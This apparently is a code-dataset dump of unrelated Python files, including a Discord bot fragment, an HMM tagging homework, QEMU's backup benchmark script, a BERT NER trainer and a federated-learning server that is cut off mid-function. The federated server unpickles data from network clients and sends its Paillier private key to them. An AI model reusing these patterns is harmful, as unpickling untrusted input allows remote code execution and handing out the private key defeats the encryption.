FUNCTIONS===============\n# ==============================================\nasync def bot_message_cleanup(message):\n TZ_Server_ID = '165310633884123137'\n TZ_FrameChannel_ID = '315052762947649536'\n TestServer_Server_ID = '302481884984639488'\n TestServer_ChannelID = '303175029884059649'\n Delay_Seconds = 10\n\n if message.channel.is_private or message.channel.id == TZ_FrameChannel_ID:\n # lazy workaround for TZ's frame data channel cuz ppl spam shit in chara channels\n # dont do shit\n return\n if message.server.id == TZ_Server_ID:\n # lazy workaround No.2\n await asyncio.sleep(Delay_Seconds)\n await bot.delete_message(message)\n return\n\n if message.channel.permissions_for(message.server.me).manage_messages:\n # self delete does not require server permissions,\n # but tying both cleanups to one check for now until I make a controllable toggle.\n await asyncio.sleep(Delay_Seconds)\n await bot.delete_message(message)\n return\n\nasync def user_message_cleanup(message):\n Delay_Seconds = 15\n if message.channel.is_private:\n return\n if message.channel.permissions_for(message.server.me).manage_messages:\n await asyncio.sleep(Delay_Seconds)\n await bot.delete_message(message)\n\nasync def is_Gagged(user_message):\n message = user_message\n # check if channel is gagged\n if message.content != '.ungagcombot':\n for channelID in combot_gagged_channels:\n if message.channel.id == channelID:\n return True\n\n return False\n\nasync def get_MoveFound_Embed(**move_attribute_dict):\n misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(move_attribute_dict['char_name'])\n embedDict = {**move_attribute_dict, **misc_details_Dict}\n embed_MoveFound = embedCreation.embed_Move_Details(**embedDict)\n\n return embed_MoveFound\n\nasync def get_SimilarMoves_Embed(user_Chara_Name, user_Chara_Move):\n misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(user_Chara_Name)\n similar_moves_list = tekkenFinder.get_Similar_Moves(user_Chara_Name, user_Chara_Move)\n embed_SimilarMoves = embedCreation.embed_Similar_Moves(similar_moves_list, user_Chara_Name, **misc_details_Dict)\n\n return embed_SimilarMoves\n\n#Starts the bot\nbot.run(token)\n\nhandlers = log.handlers[:]\nfor hdlr in handlers:\n hdlr.close()\n log.removeHandler(hdlr)\n","repo_name":"hanyaah/TkPublic","sub_path":"TekkenBot.py","file_name":"TekkenBot.py","file_ext":"py","file_size_in_byte":9519,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"69880968584","text":"\ndef dist_idl(n1,m1=None):\n ''' Copy of IDL's dist.pro\n Create a rectangular array in which each element is \n proportinal to its frequency'''\n\n import numpy as np\n\n #n1 = n[0]\n if m1 == None:\n m1 = n1\n #print m1\n #print n1\n\n x = np.arange(float(n1))\n for i in range(len(x)): x[i]= min(x[i],(n1 - x[i])) ** 2.\n\n a = np.zeros([float(n1),float(m1)])\n\n i2 = m1/2 + 1\n\n #print i2\n for i in np.arange(i2):\n y = np.sqrt(x + i ** 2.)\n a[:,i] = y\n if i != 0:\n a[:,m1-i]=y \n\n return a\n\n\n","repo_name":"deutschmarco/VieroLibrary","sub_path":"dist_idl.py","file_name":"dist_idl.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24050700375","text":"import unittest\n\nfrom directory_api_users_test_base import DirectoryApiUsersTestBase\nfrom test_utils import GetExpectedPrintOutput\n\n\nclass DirectoryApiUsersCustomerIdTest(DirectoryApiUsersTestBase):\n \"\"\"Tests api's used by ls_customer_id.py.\"\"\"\n\n def testCanGetCustomerIdWithValidDomain(self):\n self.assertEqual(\n self.primary_customer_id,\n self._api_wrapper.GetCustomerId(self.primary_domain))\n\n def testCustomerIdWithUnknownDomainIsNone(self):\n self.assertIsNone(self._api_wrapper.GetCustomerId(self.unknown_domain))\n\n\nclass DirectoryApiPrintUsersCustomerIdStdoutTest(DirectoryApiUsersTestBase):\n \"\"\"Tests api's used by ls_customer_id.py.\"\"\"\n\n def testPrintCustomerIdWithValidDomainHasExpectedOutput(self):\n self._api_wrapper.PrintCustomerId(self.primary_domain)\n self.assertEqual(GetExpectedPrintOutput('PrintCustomerId.1'),\n self._new_stdout.print_messages)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"google/gfw-toolkit","sub_path":"toolkit/tests/directory_api_users_customerid_test.py","file_name":"directory_api_users_customerid_test.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"81"} +{"seq_id":"16198278335","text":"from disassembler import *\n\ndef main():\n x = input(\"Please enter a list of integers separated by spaces: \")\n lst = x.split()\n \n print(\"Here are the characters in the string.\")\n \n for a in x:\n print(a)\n \n print(\"Here are the elements of the list after splitting the string.\")\n for b in lst:\n print(int(b))\n \n print(\"Here are the elements of the list using indexing.\")\n \n for c in range(len(lst)):\n print(lst[c])\n \n print(\"Here are the elements backwards using indexing.\")\n \n for c in range(len(lst)-1,-1,-1):\n print(lst[c])\n \n product = 1\n sum = 0\n \n for b in lst:\n product = product * int(b)\n sum = sum + int(b)\n \n print(\"The sum of the integers is\", sum, \"and the product is\", product)\n \ndisassemble(main)","repo_name":"kentdlee/CoCo","sub_path":"tests/iterators.py","file_name":"iterators.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"81"} +{"seq_id":"21254921507","text":"'''\ncs 375\ntongyu zhou\nhw 3\n'''\nimport pandas as pd\n\ndef transition_counts(corpus):\n tags = []\n for i in corpus: tags.extend([j.split('/')[1] for j in i]) \n # initializes matrix of tags\n temp = list(set(tags))\n temp.append('E')\n table = {i:{j:1 for j in temp} for i in list(set(tags))}\n table['S'] = {j:1 for j in temp}\n # counts occurences of tags in the corpus\n for line in corpus:\n table['S'][line[0].split('/')[1]] += 1\n for first, second in zip(line, line[1:]):\n table[first.split('/')[1]][second.split('/')[1]] += 1\n table[line[-1].split('/')[1]]['E'] += 1\n return table\n\ndef emission_counts(corpus):\n tags = []\n words = []\n for i in corpus: tags.extend([j.split('/')[1] for j in i])\n for i in corpus: words.extend([j.split('/')[0] for j in i])\n table = {i:{j:1 for j in list(set(words))} for i in list(set(tags))}\n for line in corpus:\n for l in line:\n table[l.split('/')[1]][l.split('/')[0]] += 1\n return table\n\ndef probabilities(table):\n return {i:{j:table[i][j] / float(sum(table[i].values())) for j in table[i].keys()} for i in table.keys()}\n\ndef joint_prob(sent, tags, t_prob, e_prob):\n prob = t_prob['S'][tags[0]]\n for i, j in enumerate(tags): prob *= e_prob[tags[i]][sent[i]]\n for first, second in zip(tags, tags[1:]): prob *= t_prob[first][second]\n prob *= t_prob[tags[-1]]['E']\n return prob\n\ndef state_prob(word, prev_tag, t_prob, e_prob):\n prob = []\n for k in t_prob[prev_tag].keys():\n if k == 'E': prob.append(float(0))\n else: prob.append(t_prob[prev_tag][k] * e_prob[k][word])\n return prob\n\n################################################################################\ntext = open(\"corpus.txt\", 'r').read().splitlines()\ncorpus = [l.split() for l in text]\n\nprint('Question 1.1')\nprint(pd.DataFrame(transition_counts(corpus)))\n\nprint('\\nQuestion 1.2')\nt_prob = probabilities(transition_counts(corpus))\nprint(pd.DataFrame(t_prob))\n\nprint('\\nQuestion 1.3')\nprint(pd.DataFrame(emission_counts(corpus)))\n\nprint('\\nQuestion 1.4')\ne_prob = probabilities(emission_counts(corpus))\nprint(pd.DataFrame(e_prob))\n\nprint('\\nQuestion 2.1')\nsentence = \"show your light when nothing is shining\"\na = \"NOUN PRON NOUN ADV NOUN VERB NOUN\"\nb = \"VERB PRON NOUN ADV NOUN VERB VERB\"\nc = \"VERB PRON NOUN ADV NOUN VERB NOUN\"\nprint('A prob: ' + str(joint_prob(sentence.split(), a.split(), t_prob, e_prob)))\nprint('B prob: ' + str(joint_prob(sentence.split(), b.split(), t_prob, e_prob)))\nprint('C prob: ' + str(joint_prob(sentence.split(), c.split(), t_prob, e_prob)))\n\nprint('\\nQuestion 2.2')\nviterbi_table = []\nmax_prev = 1 # probability of S\nprev_tag = 'S' # sentence start\ntags = []\nrow_names = [k for k in list(t_prob[prev_tag].keys())[:-1]]\nfor word in sentence.split():\n state = state_prob(word, prev_tag, t_prob, e_prob)\n viterbi_table.append([x * max_prev for x in state[:-1]])\n max_prev = max(viterbi_table[-1])\n max_index = viterbi_table[-1].index(max_prev)\n prev_tag = list(t_prob[prev_tag].keys())[max_index]\n tags.append(prev_tag)\ntable = pd.DataFrame(viterbi_table, index = sentence.split(), columns = row_names).transpose()\nprint(table)\nprint('POS tagging :' + str(tags))\nprint('Probability: ' + str(max(viterbi_table[-1]) * t_prob[tags[-1]]['E']))\n","repo_name":"eutopi/nlp","sub_path":"hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19269131140","text":"from __future__ import print_function\n\nimport unittest\n\nfrom sage.all import *\nfrom cornacchia import cornacchia\n\n\nclass CornacchiaTest(unittest.TestCase):\n\n def test_cornacchia(self):\n d = 2\n m = 22\n res = cornacchia(d, m)\n self.assertTrue(res is not None)\n x, y = res\n print(type(x))\n print(type(y))\n self.assertTrue(type(x) == type(y) == Integer)\n self.assertTrue(x ** 2 + d * y ** 2 == m)\n self.assertTrue(gcd(x, y) == 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"joelypoley/kplt","sub_path":"src/cornacchia_test.py","file_name":"cornacchia_test.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72642969546","text":"import argparse\nimport json\n\nimport simplebench\nfrom results_to_text import results_to_text\nfrom bench_block_job import bench_block_copy, drv_file, drv_nbd, drv_qcow2\n\n\ndef bench_func(env, case):\n \"\"\" Handle one \"cell\" of benchmarking table. \"\"\"\n cmd_options = env['cmd-options'] if 'cmd-options' in env else {}\n return bench_block_copy(env['qemu-binary'], env['cmd'],\n cmd_options,\n case['source'], case['target'])\n\n\ndef bench(args):\n test_cases = []\n\n # paths with colon not supported, so we just split by ':'\n dirs = dict(d.split(':') for d in args.dir)\n\n nbd_drv = None\n if args.nbd:\n nbd = args.nbd.split(':')\n host = nbd[0]\n port = '10809' if len(nbd) == 1 else nbd[1]\n nbd_drv = drv_nbd(host, port)\n\n for t in args.test:\n src, dst = t.split(':')\n\n if src == 'nbd' and dst == 'nbd':\n raise ValueError(\"Can't use 'nbd' label for both src and dst\")\n\n if (src == 'nbd' or dst == 'nbd') and not nbd_drv:\n raise ValueError(\"'nbd' label used but --nbd is not given\")\n\n if src == 'nbd':\n source = nbd_drv\n elif args.qcow2_sources:\n source = drv_qcow2(drv_file(dirs[src] + '/test-source.qcow2'))\n else:\n source = drv_file(dirs[src] + '/test-source')\n\n if dst == 'nbd':\n test_cases.append({'id': t, 'source': source, 'target': nbd_drv})\n continue\n\n if args.target_cache == 'both':\n target_caches = ['direct', 'cached']\n else:\n target_caches = [args.target_cache]\n\n for c in target_caches:\n o_direct = c == 'direct'\n fname = dirs[dst] + '/test-target'\n if args.compressed:\n fname += '.qcow2'\n target = drv_file(fname, o_direct=o_direct)\n if args.compressed:\n target = drv_qcow2(target)\n\n test_id = t\n if args.target_cache == 'both':\n test_id += f'({c})'\n\n test_cases.append({'id': test_id, 'source': source,\n 'target': target})\n\n binaries = [] # list of (<label>, <path>, [<options>])\n for i, q in enumerate(args.env):\n name_path = q.split(':')\n if len(name_path) == 1:\n label = f'q{i}'\n path_opts = name_path[0].split(',')\n else:\n assert len(name_path) == 2 # paths with colon not supported\n label = name_path[0]\n path_opts = name_path[1].split(',')\n\n binaries.append((label, path_opts[0], path_opts[1:]))\n\n test_envs = []\n\n bin_paths = {}\n for i, q in enumerate(args.env):\n opts = q.split(',')\n label_path = opts[0]\n opts = opts[1:]\n\n if ':' in label_path:\n # path with colon inside is not supported\n label, path = label_path.split(':')\n bin_paths[label] = path\n elif label_path in bin_paths:\n label = label_path\n path = bin_paths[label]\n else:\n path = label_path\n label = f'q{i}'\n bin_paths[label] = path\n\n x_perf = {}\n is_mirror = False\n for opt in opts:\n if opt == 'mirror':\n is_mirror = True\n elif opt == 'copy-range=on':\n x_perf['use-copy-range'] = True\n elif opt == 'copy-range=off':\n x_perf['use-copy-range'] = False\n elif opt.startswith('max-workers='):\n x_perf['max-workers'] = int(opt.split('=')[1])\n\n backup_options = {}\n if x_perf:\n backup_options['x-perf'] = x_perf\n\n if args.compressed:\n backup_options['compress'] = True\n\n if is_mirror:\n assert not x_perf\n test_envs.append({\n 'id': f'mirror({label})',\n 'cmd': 'blockdev-mirror',\n 'qemu-binary': path\n })\n else:\n test_envs.append({\n 'id': f'backup({label})\\n' + '\\n'.join(opts),\n 'cmd': 'blockdev-backup',\n 'cmd-options': backup_options,\n 'qemu-binary': path\n })\n\n result = simplebench.bench(bench_func, test_envs, test_cases,\n count=args.count, initial_run=args.initial_run,\n drop_caches=args.drop_caches)\n with open('results.json', 'w') as f:\n json.dump(result, f, indent=4)\n print(results_to_text(result))\n\n\nclass ExtendAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n items = getattr(namespace, self.dest) or []\n items.extend(values)\n setattr(namespace, self.dest, items)\n\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser('Backup benchmark', epilog='''\nENV format\n\n (LABEL:PATH|LABEL|PATH)[,max-workers=N][,use-copy-range=(on|off)][,mirror]\n\n LABEL short name for the binary\n PATH path to the binary\n max-workers set x-perf.max-workers of backup job\n use-copy-range set x-perf.use-copy-range of backup job\n mirror use mirror job instead of backup''',\n formatter_class=argparse.RawTextHelpFormatter)\n p.add_argument('--env', nargs='+', help='''\\\nQemu binaries with labels and options, see below\n\"ENV format\" section''',\n action=ExtendAction)\n p.add_argument('--dir', nargs='+', help='''\\\nDirectories, each containing \"test-source\" and/or\n\"test-target\" files, raw images to used in\nbenchmarking. File path with label, like\nlabel:/path/to/directory''',\n action=ExtendAction)\n p.add_argument('--nbd', help='''\\\nhost:port for remote NBD image, (or just host, for\ndefault port 10809). Use it in tests, label is \"nbd\"\n(but you cannot create test nbd:nbd).''')\n p.add_argument('--test', nargs='+', help='''\\\nTests, in form source-dir-label:target-dir-label''',\n action=ExtendAction)\n p.add_argument('--compressed', help='''\\\nUse compressed backup. It automatically means\nautomatically creating qcow2 target with\nlazy_refcounts for each test run''', action='store_true')\n p.add_argument('--qcow2-sources', help='''\\\nUse test-source.qcow2 images as sources instead of\ntest-source raw images''', action='store_true')\n p.add_argument('--target-cache', help='''\\\nSetup cache for target nodes. Options:\n direct: default, use O_DIRECT and aio=native\n cached: use system cache (Qemu default) and aio=threads (Qemu default)\n both: generate two test cases for each src:dst pair''',\n default='direct', choices=('direct', 'cached', 'both'))\n\n p.add_argument('--count', type=int, default=3, help='''\\\nNumber of test runs per table cell''')\n\n # BooleanOptionalAction helps to support --no-initial-run option\n p.add_argument('--initial-run', action=argparse.BooleanOptionalAction,\n help='''\\\nDo additional initial run per cell which doesn't count in result,\ndefault true''')\n\n p.add_argument('--drop-caches', action='store_true', help='''\\\nDo \"sync; echo 3 > /proc/sys/vm/drop_caches\" before each test run''')\n\n bench(p.parse_args())\n","repo_name":"qemu/qemu","sub_path":"scripts/simplebench/bench-backup.py","file_name":"bench-backup.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","stars":8597,"dataset":"github-code","pt":"81"} +{"seq_id":"21111366969","text":"from tkinter import *\nfrom gui.errormsg import error_message\n\n\nclass SelectFrame(Frame):\n \"\"\" Provides a label for recipe name and a checkbox indicating selected status.\n Contained within the canvas_frame, itself belonging to the ScrollFrame\n \"\"\"\n\n def __init__(self,\n parent: Frame,\n ssf: 'SelectionScrollFrame',\n width: int,\n height: int,\n recipe: dict,\n row: int,\n bg: str):\n Frame.__init__(self, parent, width=width, height=height)\n self.parent: Frame = parent\n self.ssf = ssf\n self.recipe_id: int = recipe['recipe_id']\n self.recipe: dict = recipe\n self.default_color: str = bg\n self.grid(column=0, row=row, sticky=(N, S, E, W)) # Sticky ensures full sizing Perhaps \"weight\" in the parent would do as well\n self.propagate(False)\n self.configure(background='blue')\n # Establishing norms for contained widgets\n self.columnconfigure(0, minsize=20)\n self.columnconfigure(1, minsize=20, weight=1) # weight allows the label to stretch!\n\n # Building contents\n self.checkbox_var: IntVar = IntVar()\n self.checkbox: Checkbutton = Checkbutton(self, height=2, variable=self.checkbox_var, command=self._select_recipe)\n self.checkbox.grid(column=0, row=0)\n self.checkbox.config(background=bg)\n # # # Label\n self.label: Label = Label(self, width=1, height=1, text=recipe['recipe_title'])\n self.label.grid(column=1, row=0, sticky=(N, S, E, W))\n self.label.config(background=bg)\n\n # Enabling scrolling action\n self.bind('<Enter>', lambda evnt: evnt.widget.bind('<MouseWheel>', self.ssf.on_mousewheel))\n self.bind('<Leave>', lambda evnt: evnt.widget.unbind_all('<MouseWheel>'))\n self.checkbox.bind('<Enter>', lambda evnt: evnt.widget.bind('<MouseWheel>', self.ssf.on_mousewheel))\n self.checkbox.bind('<Leave>', lambda evnt: evnt.widget.unbind_all('<MouseWheel>'))\n self.label.bind('<Enter>', lambda evnt: evnt.widget.bind('<MouseWheel>', self.ssf.on_mousewheel))\n self.label.bind('<Leave>', lambda evnt: evnt.widget.unbind_all('<MouseWheel>'))\n\n # Enabling recipe toggle action\n self.bind('<Button-1>', self._update_detail_frame)\n # self.checkbox.bind('<Button-1>', self._update_detail_frame) # This behavior is annoying\n self.label.bind('<Button-1>', self._update_detail_frame)\n\n def _update_detail_frame(self, event):\n print('Clicked wtf' + str(self.recipe_id))\n root: 'View' = self.ssf.parent\n root.update_detail_frame(self.recipe_id)\n if self.ssf.highlighted_frame is not None:\n self.ssf.highlighted_frame.reset_color()\n self.configure(background='blue')\n self.label.configure(background='light blue')\n self.checkbox.configure(background='light blue')\n self.ssf.highlighted_frame = self\n\n def _select_recipe(self):\n root: 'View' = self.ssf.parent\n root.controller.toggle_recipe(self.recipe_id)\n\n def reset_color(self):\n \"\"\" Resets the frame to its default color. Invoked when the frame is deselected. \"\"\"\n self.config(background=self.default_color)\n self.checkbox.config(background=self.default_color)\n self.label.config(background=self.default_color)\n\n","repo_name":"RyanEliopoulos/autoshopper","sub_path":"gui/SelectFrame.py","file_name":"SelectFrame.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"3803089300","text":"\"\"\"\nmain_train.py은 모델 학습을 진행하는 스크립트입니다.\ne.g. https://github.com/wisdomify/wisdomify/blob/main/main_train.py\n\"\"\"\nimport random\nimport torch\nimport wandb\nimport argparse\nimport numpy as np\nimport pytorch_lightning as pl\nfrom transformers import BertTokenizer, BertModel\nfrom BERT.datamodules import AnmSourceNERDataModule, AnmNERDataModule, SourceNERDataModule\nfrom BERT.loaders import load_config\nfrom BERT.models import BiLabelNER, MonoLabelNER, BiLabelNERWithBiLSTM\nfrom BERT.labels import ANM_LABELS, SOURCE_LABELS\nfrom BERT.paths import bi_label_ner_ckpt\nfrom pytorch_lightning.loggers import WandbLogger\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, default=\"mono_label_ner\")\n parser.add_argument(\"--ver\", type=str, default=\"test_anm\")\n args = parser.parse_args()\n config = load_config(args.model, args.ver)\n # command-line arguments 도 기록하기!\n config.update(vars(args))\n # --- fix random seeds -- #\n torch.manual_seed(config['seed'])\n random.seed(config['seed'])\n np.random.seed(config['seed'])\n # --- prepare the model and the datamodule --- #\n tokenizer = BertTokenizer.from_pretrained(config['bert'])\n bert = BertModel.from_pretrained(config['bert'])\n\n if config['model'] == BiLabelNER.name:\n model = BiLabelNER(bert=bert, lr=float(config['lr']), num_labels_pair=(len(ANM_LABELS), len(SOURCE_LABELS)))\n datamodule = AnmSourceNERDataModule(config, tokenizer)\n elif config['model'] == BiLabelNERWithBiLSTM.name:\n model = BiLabelNERWithBiLSTM(bert=bert, lr=float(config['lr']), num_labels_pair=(len(ANM_LABELS),\n len(SOURCE_LABELS)))\n datamodule = AnmSourceNERDataModule(config, tokenizer)\n elif config['model'] == MonoLabelNER.name:\n if config['label_type'] == \"anm\":\n model = MonoLabelNER(bert=bert, lr=float(config['lr']), num_labels=len(ANM_LABELS),\n hidden_size=bert.config.hidden_size)\n datamodule = AnmNERDataModule(config, tokenizer)\n elif config['label_type'] == \"source\":\n model = MonoLabelNER(bert=bert, lr=float(config['lr']), num_labels=len(SOURCE_LABELS),\n hidden_size=bert.config.hidden_size)\n datamodule = SourceNERDataModule(config, tokenizer)\n else:\n raise ValueError(f\"Invalid label_type: {config['label_type']}\")\n else:\n raise ValueError(f\"Invalid model: {config['model']}\")\n\n # --- instantiate the trainer --- #\n with wandb.init(project=\"BERT\", config=config) as run:\n logger = WandbLogger(log_model=False)\n trainer = pl.Trainer(max_epochs=config['max_epochs'],\n log_every_n_steps=config['log_every_n_steps'],\n gpus=torch.cuda.device_count(),\n enable_checkpointing=False,\n logger=logger)\n try:\n trainer.fit(model=model, datamodule=datamodule)\n except Exception as e:\n raise e\n else:\n # --- save the model locally, as push it to wandb as an artifact --- #\n # 오류 없이 학습이 완료되었을 때만 모델을 저장하기!\n model_path = bi_label_ner_ckpt()\n trainer.save_checkpoint(model_path)\n artifact = wandb.Artifact(name=model.name, type=\"model\", metadata=config)\n artifact.add_file(model_path, \"ner.ckpt\")\n run.log_artifact(artifact, aliases=[\"latest\", config['ver']])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pirates14/BERT","sub_path":"main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"13414609","text":"import zmq\nimport json\nimport time\n\nfrom intercom.minion import discover_relay\n\n\ndef dump(string):\n return bytes(json.dumps(string), 'utf-8')\n\n\nclass Controller:\n\n def __init__(self, name, relay='tcp://relay.intercom:5556'):\n self.name = name\n relay_out, relay_in = discover_relay()\n self.relay = relay_in\n self.reset()\n\n def reset(self):\n self.context = zmq.Context()\n\n def send(self, topic, msg):\n if type(topic) != bytes:\n topic = bytes(str(topic), 'utf-8')\n messagedata = bytes(json.dumps(msg), 'utf-8')\n\n socket = self.context.socket(zmq.REQ)\n socket.connect(self.relay)\n socket.send(topic + b' ' + messagedata)\n reply = socket.recv()\n assert reply\n\n\nclass SampleController(Controller):\n\n def do(self, action):\n topic = 'do:arduino.switch'\n\n msg = {'origin': self.name,\n 'group': '00011',\n 'plug': '10000',\n 'action': action,\n }\n print('Sending:', topic, msg)\n self.send(topic, msg)\n\nif __name__ == '__main__':\n\n # Obtaining optional hostname from CLI:\n import sys\n if len(sys.argv) > 1:\n host = sys.argv[1]\n else:\n host = 'relay.intercom'\n if ':' not in host:\n host += ':5556'\n\n c = SampleController('bob', 'tcp://' + host)\n while True:\n print('on')\n c.do('on')\n time.sleep(1)\n print('off')\n c.do('off')\n time.sleep(1)\n","repo_name":"oksome/Intercom","sub_path":"intercom/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11589713761","text":"import pickle\nimport keras\nimport uuid\nfrom paillier import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, LeakyReLU\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\nimport datetime\nimport msgpack\nimport random\nimport codecs\nimport numpy as np\nimport json\nimport msgpack_numpy\nfrom keras.layers import Dense, Dropout, Flatten, Activation\nimport sys\nimport time\nfrom keras.models import load_model\nfrom flask import *\nfrom flask_socketio import SocketIO\nfrom flask_socketio import *\nlength=64\n\npriv1, pub1 = generate_keypair(length)#密钥长度\nlargeint=100000\nnp.set_printoptions(suppress=True)\nwith open(\"model_server_log.txt\", \"w\") as f:\n f.write('model_server\\n')\n f.write('密钥长度'+str(length)+'\\n')\nclass GlobalModel(object):\n \"\"\"docstring for GlobalModel\"\"\"\n def __init__(self):\n self.model = self.build_model()\n self.current_weights = self.model.get_weights()\n self.img_shape = (28,28,1)\n # for convergence check集合检查\n self.prev_train_loss = None\n # all rounds; losses[i] = [round#, timestamp, loss]\n # round# could be None if not applicable\n self.training_start_time = int(round(time.time())) # 当前时间戳四舍五入\n self.start = int(round(time.time()))\n\n def build_model(self):\n raise NotImplementedError()\n\n # client_updates = [(w, n)..]\n def update_weights(self, client_weights):\n #new_weights = [np.zeros(w.shape) for w in self.current_weights]\n #for i in range(len(new_weights)):\n #new_weights[i] = client_weights[i]\n self.current_weights = client_weights\n print('服务器更新成功!')\nclass GlobalModel_MNIST_CNN(GlobalModel):\n def __init__(self):\n super(GlobalModel_MNIST_CNN, self).__init__()\n\n def build_model(self):\n # ~5MB worth of parameters\n model = Sequential()\n # model.add(Conv2D(32, kernel_size=(3, 3),\n # activation='relu',\n # input_shape=(28, 28, 1)))\n # model.add(Conv2D(64, (3, 3), activation='relu'))\n # model.add(MaxPooling2D(pool_size=(2, 2)))\n # model.add(Dropout(0.25))\n # model.add(Flatten())\n # model.add(Dense(128, activation='relu'))\n # model.add(Dropout(0.5))\n # model.add(Dense(10, activation='softmax'))\n # model = Sequential([Dense(32, input_dim=784), Activation('relu'), Dense(16), \\\n # Activation('relu'), Dense(10), Activation('softmax')])\n self.img_shape = (28, 28, 1)\n model.add(Flatten(input_shape=self.img_shape))\n model.add(Dense(512))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(1024))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(256))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(10, activation='sigmoid'))\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=0.001, momentum=0.9, decay=0.0000001, nesterov=False),\n metrics=['accuracy'])\n return model\n\nclass model_Server(object):\n MIN_NUM_WORKERS = 5\n MAX_NUM_ROUNDS = 50\n NUM_CLIENTS_CONTACTED_PER_ROUND = 5\n ROUNDS_BETWEEN_VALIDATIONS = 2\n init=True\n def __init__(self, global_model, host, port):\n self.global_model = global_model()\n self.update_client_sids = set()\n self.ready_client_sids = set()\n self.flag = 1\n self.first_id = 0\n self.secend_id = 0\n self.app = Flask(__name__)\n self.socketio = SocketIO(self.app)\n self.host = host\n self.port = port\n self.model_id = str(uuid.uuid4()) # 随机生成uuid\n\n #####\n # training states\n self.current_round = 0 # -1 for not yet started尚未开始\n self.current_round_client_updates = []\n self.eval_client_updates = []\n self.client_updates_weights = []\n self.cnt = 0\n self.i = 0\n self.a=[]\n self.register_handles()\n\n\n def register_handles(self):\n # single-threaded async, no need to lock\n\n @self.socketio.on('connect')\n def handle_connect():\n print(request.sid[0], \"connected\")\n\n @self.socketio.on('reconnect')\n def handle_reconnect():\n print(request.sid, \"reconnected\")\n\n @self.socketio.on('client_req_update')\n def handle_wake_up():\n self.ready_client_sids.add(request.sid)\n print(\"连接客户: \", request.sid,len(self.ready_client_sids))\n con=3#增加用户\n print(\"连接客户: \", request.sid, len(self.ready_client_sids)%con == 0 )\n\n if (len(self.ready_client_sids)%con == 0 ):\n while self.flag==0:\n time.sleep(0.1)\n id = []\n for idd in self.ready_client_sids:\n id.append(idd)\n self.ready_client_sids = set()\n emit('request_update', {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'weights_format': 'pickle',\n 'priv': obj_to_pickle_string(priv1),\n 'pub': obj_to_pickle_string(pub1),\n\n }, room=id[0])\n print(\"客户端\",id[0])\n emit('request_update', {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'weights_format': 'pickle',\n 'priv': obj_to_pickle_string(priv1),\n 'pub': obj_to_pickle_string(pub1),\n }, room=id[1])\n print(\"客户端\", id[1])\n emit('request_update', {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'weights_format': 'pickle',\n 'priv': obj_to_pickle_string(priv1),\n 'pub': obj_to_pickle_string(pub1),\n }, room=id[2])\n print(\"客户端\", id[2])\n\n self.current_round+=1\n\n\n @self.socketio.on('client_update')\n def handle_client_update(data):\n self.update_client_sids.add(request.sid)\n print(\"连接更新: \", request.sid, len(self.update_client_sids))\n print(\"连接更新: \", request.sid, len(self.update_client_sids) % 3 == 0)\n self.a.append(pickle_string_to_obj(data['weights']))\n\n if (len(self.a)%3 == 0):\n self.flag=0\n t1 = time.time()\n\n self.client_updates_weights=add(self.a[0],add(self.a[1],self.a[2]))\n self.global_model.update_weights(self.client_updates_weights)\n self.flag = 1\n t2=time.time()\n with open(\"model_server_log.txt\", \"a\") as f:\n f.write(str(self.i)+'轮循环聚合时长' + str(t2 - t1) + '\\n')\n self.i+=1\n self.a=[]\n #GAN\n\n\n def start(self):\n self.socketio.run(self.app, host=self.host, port=self.port)\n\n\ndef obj_to_pickle_string(x):\n return codecs.encode(pickle.dumps(x), \"base64\").decode()\n # return msgpack.packb(x, default=msgpack_numpy.encode)\n # TODO: compare pickle vs msgpack vs json for serialization; tradeoff: computation vs network IO\n\n\ndef pickle_string_to_obj(s):\n return pickle.loads(codecs.decode(s.encode(), \"base64\")) # 模型返序列化loads,编解码en/decode\n # return msgpack.unpackb(s, object_hook=msgpack_numpy.decode)\n\n\n\n\ndef add(a,b):\n #print()\n for i in range(len(a)):\n #b[i]=b[i].tolist()\n for j in range(len(a[i])):\n if type(a[i][j])==type(1):\n a[i][j] = b[i][j]*(a[i][j])\n else:\n for k in range(len(a[i][j])):\n 